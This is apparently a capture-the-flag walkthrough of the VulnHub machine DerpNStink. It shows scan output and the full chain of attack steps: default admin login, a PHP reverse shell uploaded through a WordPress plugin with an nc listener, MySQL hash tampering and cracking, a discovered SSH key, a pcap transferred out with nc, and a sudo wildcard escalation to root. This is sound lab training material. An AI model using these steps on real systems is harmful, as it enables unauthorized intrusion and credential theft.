> For the complete documentation index, see [llms.txt](https://choochisiang.gitbook.io/report/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://choochisiang.gitbook.io/report/vulnhub/derpnstink.md).

# DerpNStink

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/DNS 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 04:37 EDT
Nmap scan report for 192.168.1.116
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:7D:91:B5 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
```

Let's put the IP to the web browser

![](/files/-M8A-Tc63uSURbQHHd-d)

If we go to inspect element and open up all div we can get the first flag

![](/files/-M8AtBYTz53KeFg07TxL)

### Dirb

```
dirb http://192.168.1.116/
```

```
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 25 04:50:28 2020
URL_BASE: http://192.168.1.116/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.116/ ----
==> DIRECTORY: http://192.168.1.116/css/                                                                                              
+ http://192.168.1.116/index.html (CODE:200|SIZE:1298)                                                                                
==> DIRECTORY: http://192.168.1.116/javascript/                                                                                       
==> DIRECTORY: http://192.168.1.116/js/                                                                                               
==> DIRECTORY: http://192.168.1.116/php/                                                                                              
+ http://192.168.1.116/robots.txt (CODE:200|SIZE:53)                                                                                  
+ http://192.168.1.116/server-status (CODE:403|SIZE:293)                                                                              
==> DIRECTORY: http://192.168.1.116/temporary/                                                                                        
==> DIRECTORY: http://192.168.1.116/weblog/   
```

We can see at the nmap and dirb scan has `robots.txt`, lets navigate to there

![](/files/-M8A-bpmu9adbWHI9tns)

![](/files/-M8A-nADQayOSMWBS1eW)

![](/files/-M8A-peND3WV5ba3bMAv)

As we can see, we don't have permission on `/php` and `/temporary` told us to try harder.

We also can see a `/weblog` in the dirb scan. After navigating to there I got an error

![](/files/-M8A0wAF-4zNWFAzVWLH)

I navigate to /etc/hosts and add a IP at there

![](/files/-M8A18I_PPouJrFRtDs3)

After that refresh the page and we can see a WordPress Blog

![](/files/-M8A1IkPjz5VfQNw2zkx)

### Wpscan

```
wpscan --url http://derpnstink.local/weblog/ --enumerate u,ap --plugins-detection aggressive
```

```
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://derpnstink.local/weblog/ [192.168.1.116]
[+] Started: Mon May 25 04:55:03 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.7 (Ubuntu)
 |  - X-Powered-By: PHP/5.5.9-1ubuntu4.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://derpnstink.local/weblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://derpnstink.local/weblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://derpnstink.local/weblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.6.18 identified (Latest, released on 2020-04-29).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: '-release.min.js?ver=4.6.18'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: 'WordPress 4.6.18'

[+] WordPress theme in use: twentysixteen
 | Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:02:19 <===================================================> (86907 / 86907) 100.00% Time: 00:02:19
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://derpnstink.local/weblog/wp-content/plugins/akismet/
 | Last Updated: 2020-04-29T13:02:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 4.1.5
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/, status: 200
 |
 | Version: 3.1.11 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt

[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2019-07-12T13:09:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | [!] The version is out of date, the latest version is 1.6.12
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/, status: 403
 |
 | Version: 1.4.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] unclestinky
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon May 25 04:57:36 2020
[+] Requests Done: 86966
[+] Cached Requests: 12
[+] Data Sent: 22.571 MB
[+] Data Received: 11.789 MB
[+] Memory used: 368.992 MB
[+] Elapsed time: 00:02:33
```

We got 2 plugins and 2 usernames, for the first try, I managed to log in using the username `admin` and password `admin`

![](/files/-M8A48-VH770y56yuUtw)

After clicking around, I found out that under manage slides we can edit the slideshow and bottom we can see that we can upload image. So, I decided to upload a shell file.

## Exploitation

### Reverse Shell

Go to this page and download the php reverse shell file from [pentestmonkey](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)

![](/files/-M8A8rQguug1Beb06XHW)

Change the IP and the port to our machine then we need to set up a listener

```
nc -nlvp 4444
```

Then we can go to `Manage Slides`&#x20;

![](/files/-M8A9BFotlq6wQ7zAU_A)

And I click `randonx` to edit&#x20;

&#x20;

![](/files/-M8A9GfV72ePZW9NqC1y)

Scroll to the bottom we can see this&#x20;

![](/files/-M8A9MKJOVlMMww74vgD)

![](/files/-M8A9OdyfjxVHE77aUZU)

Upload the reverse shell file.

Then go back to the `/weblog`

![](/files/-M8A9XpPMpqKsYgBNXR2)

Click the right arrow on the slides until you get a reverse shell!

![](/files/-M8A9hmK2YT5edTOYzmV)

And then we can type

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

![](/files/-M8AB65F6nW4te-tQBf4)

When I run `linpeas.sh`, I found mysql username and password.&#x20;

![](/files/-M8AXPhE_-0Y-RIAMuop)

Then we can go `/php/myphpadmin` to log into the MySQL database

Then go to wordpress database and go to `wp_users`

I found out that the hash is too difficult to crack because of hash, make it easy, I copy the admin hash to replace the `unclestinky` hash

![](/files/-M8AXoO5GHipji0WjZa2)

Then we can login into the wordpress again

Go to the post, and we will find the second flag.

![](/files/-M8AXxltNJ2zqarz_9GQ)

We then go back to the database and go to `mysql` database and go to `user` table.

![](/files/-M8A_KCYqMNmJ9eG0_U6)

Then we can take unclestinky password to crack it at [here](https://crackstation.net/)

![](/files/-M8A_FZV7tIsr_ApCvok)

We got the password `wedgie57`

We then can ssh to the user **stinky**

![](/files/-M8A_l_8LWEbsg6b1-Bl)

Then I went to the Desktop folder and I found the third flag!

![](/files/-M8AcAXRKFje0jBKokrS)

After that, I went to the `/home` directory, I found out 1 ftp folder

![](/files/-M8AaD31-qV51hM0-d0h)

Then, there is a bunch of ssh files inside over each other

![](/files/-M8AaGHia-QN2AHLXWzE)

After 7 times of changing directory, we got `key.txt`

![](/files/-M8AaPr59JfMLStF9RaF)

It contains RSA  private key

![](/files/-M8AaS-q0S10JqMiR6-D)

This might a clue on ssh to the user stinky

We save the RSA txt to a file called `id_rsa` and put it at `/root/.ssh`

![](/files/-M8AegPqDUo-EXzDGFtP)

We can see that the id\_rsa is too open so we need to change the permission

type `chmod 700 id_rsa`

Then we can ssh into it&#x20;

```
ssh -i /root/.ssh/id_rsa stinky@192.168.1.116
```

![](/files/-M8Af1enPMmbax61wP6i)

Then navigate to `/home/Stinky/Documents` we can get a pcap file

![](/files/-M8Agsv7hUdUAHL5rg5M)

Transfer it using `nc` to our machine

Then analyse the file using `wireshark`

![](/files/-M8AoEfeiNID2L6wbgBn)

Then we can follow the TCP stream and this is the password for user mrderp.

we then `su` to user `mrderp`

Then type `sudo -l`&#x20;

![](/files/-M8Ao_sU7JxhftpVv51D)

## Privilege Escalation

We can see that inside the /home/mrderp we don't have the folder called `binaries`.

![](/files/-M8ArfqLy3Y8T_WE-Z1O)

So we need to create one

```
mkdir binaries
cd binaries
echo "/bin/bash" > derpy.sh
chmod 777 derpy.sh
sudo /home/mrderp/derpy*
```

![](/files/-M8AseND0DJfb0blwC8T)

Got root !

Navigate to the `/root/Desktop` to get the fourth flag

![](/files/-M8AslmYWD48UKj9q8ql)
